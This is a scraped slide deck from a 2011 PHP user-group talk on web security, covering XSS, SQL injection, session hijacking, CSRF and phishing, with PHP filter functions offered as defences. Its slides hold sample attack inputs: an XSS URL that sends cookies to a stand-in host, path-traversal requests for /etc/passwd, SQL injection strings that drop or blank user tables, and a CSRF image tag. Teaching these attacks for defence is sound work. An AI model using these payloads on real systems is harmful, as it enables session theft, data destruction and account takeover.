SydPHP Security in PHP

Tags:

Preview:

Click to see full reader

DESCRIPTION

Security in PHP talk for SydPHP, Thursday 24th February, 2011

Citation preview

Security and PHP

February 2011

Allan Shone

Technical Yahoo!, Local Paranoid @Yahoo!7

Been at Yahoo!7 just under 3 years

allan.shone@yahoo.com

Website Security

February 2011

What is Security?

Why is Security important?

What can you do about it?

Types of issues

XSS

SQL Injection

Session Hijacking

CSRF

Phishing

Why XSS?

February 2011

Lead to larger problems

Used to inject code into your site

Bad people ™ can steal user information

http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E

http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E

http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E

February 2011

February 2011

http://sydphp.leetbix.com/template.php?load=/etc/passwd%00

http://sydphp.leetbix.com/template.php?load=../some-config.conf%00

February 2011

POST too

February 2011

What do I do?!

February 2011

Filter

Simplest solution: htmlentities()

February 2011

SQL what?

February 2011

Arbitrary SQL code being executed

Bypass login, edit database content

Find passwords, hidden information

http://sydphp.leetbix.com/login.php

Password: ‘ OR 1=1 -- ‘

‘ OR 1=1; DROP TABLE users; -- ‘

‘ OR 1=1; UPDATE TABLE users SET password=‘’ WHERE 1=1; -- ‘

February 2011

Oh no!

February 2011

http://xkcd.com/327/

February 2011

escape

February 2011

mysql_real_escape_string()

addslashes()

PDO

PDO::quote()

Session hijacking

February 2011

Bad for users

Bad for data integrity

Easy to prevent

Not stand-alone

February 2011

Cookies

February 2011

Integrity checking

February 2011

CSRF? Sugar?

February 2011

Cross-site request forgery

February 2011

Simple, but un-common

February 2011

<img src=“http://othersite.com/changepasswd?new=onlyIKnow” />

<script>a=document.createElement(‘img’);a.src=‘http://badsite../’;document.firstChild.appendChild(a);a.src=‘http://badsite.com/otherpage’;</script>

February 2011

Integrity, integrity

February 2011

Phishing!

February 2011

Same, but different?

February 2011

But what can you do

February 2011

PHP’s filter functions

February 2011

filter_has_var

filter_id

filter_input_array

filter_input

filter_list

filter_var_array

filter_var

No more SuperGlobals

February 2011

$search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);

echo ”<h3>No results found for ‘{$search}’.</h3>";

echo "<a href='?search=$search&page=2'>Next page</a>";

February 2011

INPUT_GET

INPUT_POST

INPUT_COOKIE

INPUT_SERVER

INPUT_ENV

February 2011

Twitter

Allan Shone - @cerealboyJared Mooring - @jadzor

Filter function filters: http://au2.php.net/manual/en/filter.filters.php

February 2011

Recommended

Php Security Guide
Education
Php security common 2011
Technology
Php Security Workshop
Economy & Finance
Php Security
Business
PHP Security Crash Course - 6 - PHP Code Inclusion / Evaluation
Documents
PHP Security Ryan Dunn Jason Pack. Outline PHP Overview PHP Overview Common Security Issues Common Security Issues Advanced Security Issues Advanced Security
Documents
Php web app security (eng)
Technology
Security & PHP
Technology
Intro to Php Security
Technology
Php & Web Security - PHPXperts 2009
Documents
Php My Sql Security 2007
Technology
Database security for PHP
Technology
SydPHP: IoT and Ugly Ties
Technology
Php Security Guide Ro
Documents
PHP Security Consortium: PHP Security Guide - Chris Shiflett
Documents
Web Security 2016 - php[architect] · Security Anthology 2016 php[architect] Web Security 2016 from php[architect] magazine ... affecting the future in an arguably negative way. Sample
Documents
SydPHP CV Talk
Documents
Apache and PHP Security
Technology
Security in php
Engineering
Security theatre (Scotland php)
Internet